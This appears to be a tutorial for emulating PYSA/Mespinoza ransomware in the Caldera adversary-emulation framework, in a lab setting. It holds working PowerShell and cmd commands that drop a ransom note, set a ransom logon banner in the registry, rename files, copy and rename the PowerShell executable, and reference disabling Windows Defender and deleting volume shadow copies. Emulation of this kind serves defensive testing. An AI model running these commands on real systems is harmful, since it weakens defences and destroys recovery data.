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PYSA/Mespinoza Ransomware Emulation Guide Using Caldera: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adversary and add the “Disable Windows Defender All” ability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 need to create a ability that changes the File Association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Fill in the fields as you see below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“cmd”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code section paste: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Your data is encrypted.  Contact us to get your data back! &gt; C:\Users\champuser\Desktop\READ.README &amp;&amp; assoc .README=txtfile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#This code will create a .README file on the victims desktop and put the message “Your data is #encrypted. Contact us to get your data back!” into the file.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 need to create an ability that changes the logon legal warning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Fill in the fields as shown below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“psh”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Then add the following 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This code will create a screen that the user will see when they log on telling them that their #data is encrypted.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Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "legalnoticetext" -Value "Information is on the Desktop to get your data.  We are looking forward to working together." ; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "legalnoticecaption" -Value "YOUR DATA IS ENCRYPTED !"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we need to create an ability for the ransomware itself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Fill in the fields as shown below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“psh”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 add the following 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#This code search through the C:\Users\champuser\Documents file path and finds files with the #.pdf file extension and changes .pdf to .pysa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get-childitem C:\Users\champuser\Documents -Filter "*pdf*" -Recurse | rename-item -NewName {$_.name -replace 'pdf','pysa'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 need to create an ability to emulate the “step1.ps1” and “step2.ps1” files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Fill in the fields as shown below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This part will search the C folder for .txt files and output them to a file called “AllFiles.txt” in the #public folder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Get-ChildItem -Path C:\*.txt -Recurse -Force | Out-File -FilePath C:\Users\Public\AllFiles.txt;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This part will copy the powershell executable and put it in the public folder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Copy-Item "C:\Windows\\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Destination "C:\Users\Public";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This part creates a random number and set the variable “nName” to “EnNoB-”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[Int] $rand = Get-Random -Minimum 1000 -Maximum 9876;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$nName = "EnNoB-$rand";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This part will name the file with the nName variable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Rename-Item -Path "C:\Users\Public\powershell.exe" -NewName $nName;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This section will initialize the file, filePath, and allFiles variables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$file = "C:\Users\Public\step2.ps1";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$filePath = "$" + "filePath";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$allFiles = "$" + "allFiles";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This section puts the code of the “step2.ps1” into the steps file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$steps = "param([String]$filePath,[String]$allFiles);";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$steps = $steps + " type $allFiles;";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$steps = $steps + " Remove-Item $filePath -Force;";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This will put the code in the file variable which holds the file path of the step2.ps1 file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$steps &gt; $file;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This section initializes the parameters that will be passed to the step2.ps1 file for it to execute #properly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$params = '-filePath "C:\Users\Public\$nname" -allFiles "C:\Users\Public\AllFiles.txt" -Force';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This command will execute the step2.p1 file given the parameters that were set.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Invoke-Expression "$file $params";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next step is the add the “Discover Local Hosts” ability to the adversary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Lastly add the “Windows - Delete Volume Shadow Copies” ability to the adversary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Now your adversary is complete and you are ready to run the operation on the victim's host :)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